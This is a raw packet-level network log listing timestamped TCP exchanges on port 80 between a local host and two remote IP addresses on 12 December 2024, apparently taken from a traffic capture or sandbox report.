Dec 12, 2024 16:48:39.000858068 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.000941992 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.001486063 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.001499891 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.001549006 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.001560926 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.002499104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.002549887 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.003407955 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.003454924 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.003607035 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.003618002 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.003665924 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.004671097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.004717112 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.005289078 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.005378962 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.005719900 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.005788088 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.006700993 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.006750107 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.006836891 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.006880045 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.006886959 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.006917000 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.008160114 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.008217096 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.008979082 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.009001017 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.009021044 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.009021044 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.009046078 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.009061098 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.010083914 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.010162115 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.010633945 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.010678053 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.011066914 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.011111975 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.011917114 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.011956930 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.012198925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.012212992 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.012252092 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.013267994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.013314009 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.013673067 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.013715029 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.014269114 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.014314890 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.015383005 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.015394926 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.015431881 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.015686989 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.015728951 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.016447067 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.016496897 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.016505003 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.016570091 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.017597914 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.017652988 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.017669916 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.017708063 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.018580914 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.018641949 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.019176960 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.019268036 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.019740105 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.019752979 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.019794941 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.020940065 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.020988941 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.021828890 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.021879911 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.022636890 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.022682905 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.022826910 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.022980928 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.023720026 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.023797989 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.024003983 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.024048090 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.024213076 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.024224043 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.024259090 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.025094032 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.025108099 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.025146961 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.025166988 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.026072025 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.026120901 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.026175022 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.026217937 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.027069092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.027160883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.027192116 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.027204037 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.028244972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.028300047 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.028784990 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.028835058 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.029251099 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.029298067 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.029370070 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.029428959 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.030373096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.030425072 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.031513929 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.031527996 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.031557083 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.031574011 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.031574011 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.031605005 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.032449961 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.032500029 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.032725096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.032870054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.033587933 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.033641100 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.033689022 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.034645081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.034688950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.034697056 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.034728050 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.035717010 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.035761118 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.035914898 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.035955906 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.036851883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.036864042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.036905050 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.036923885 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.037798882 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.037847042 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.038070917 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.038125038 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.038865089 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.038917065 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.039249897 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.039288044 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.040002108 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.040050030 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.088836908 CET	80	49938	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:39.088944912 CET	80	49943	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:39.089025974 CET	49943	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:39.089097977 CET	49943	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:39.176557064 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.176600933 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.176676035 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.177102089 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.177201986 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.177346945 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.177391052 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.178083897 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.178129911 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.178461075 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.178505898 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.178937912 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.178985119 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.179646015 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.179702044 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.179759979 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.179799080 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.180627108 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.180672884 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.180826902 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.180871964 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.181637049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.181763887 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.181811094 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.182801962 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.182852030 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.182950020 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.182997942 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.183845043 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.183898926 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.183928013 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.183975935 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.185034990 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.185090065 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.185162067 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.185209036 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.185992002 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.186037064 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.186332941 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.186381102 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.187041044 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.187092066 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.187176943 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.187222004 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.188106060 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.188154936 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.188224077 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.188271046 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.189182043 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.189230919 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.189299107 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.189343929 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.190238953 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.190315962 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.190468073 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.190578938 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.191596985 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.191647053 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.191775084 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.191816092 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.192382097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.192433119 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.192559958 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.192637920 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.193463087 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.193510056 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.193866014 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.193907022 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.194506884 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.194552898 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.194709063 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.194752932 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.195565939 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.195617914 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.195842028 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.195887089 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.196736097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.196785927 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.197101116 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.197484970 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.197880030 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.197927952 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.197933912 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.197977066 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.198986053 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.199033976 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.199726105 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.199778080 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.199944019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.199990034 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.200002909 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.200042963 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.200952053 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.201001883 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.201122999 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.201165915 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.202061892 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.202073097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.202111006 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.203093052 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.203187943 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.203202009 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.203239918 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.204236031 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.204287052 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.204313993 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.204360008 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.205225945 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.205274105 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.205347061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.205388069 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.206520081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.206583023 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.206876993 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.206924915 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.207423925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.207479000 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.207829952 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.207876921 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.208462000 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.208528042 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.208558083 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.208602905 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.209055901 CET	80	49943	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:39.209259987 CET	49943	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:39.209521055 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.209574938 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.210024118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.210072041 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.210565090 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.210623026 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.210743904 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.210786104 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.212275028 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.212332964 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.212488890 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.212537050 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.212770939 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.212783098 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.212832928 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.213807106 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.213910103 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.214917898 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.214931965 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.214961052 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.214999914 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.215008974 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.215939999 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.215954065 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.215996027 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.216979027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.217031002 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.217475891 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.217525959 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.218030930 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.218086958 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.218372107 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.218416929 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.219145060 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.219201088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.219208002 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.219244957 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.220185041 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.220240116 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.220315933 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.220357895 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.221278906 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.221337080 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.221695900 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.221750021 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.222361088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.222413063 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.222534895 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.222580910 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.223481894 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.223541975 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.223905087 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.223979950 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.224468946 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.224510908 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.224962950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.225008011 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.225544930 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.225590944 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.225696087 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.225742102 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.226633072 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.226685047 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.226835966 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.226892948 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.227693081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.227747917 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.227952957 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.227994919 CET	49931	80	192.168.2.10	31.41.244.11
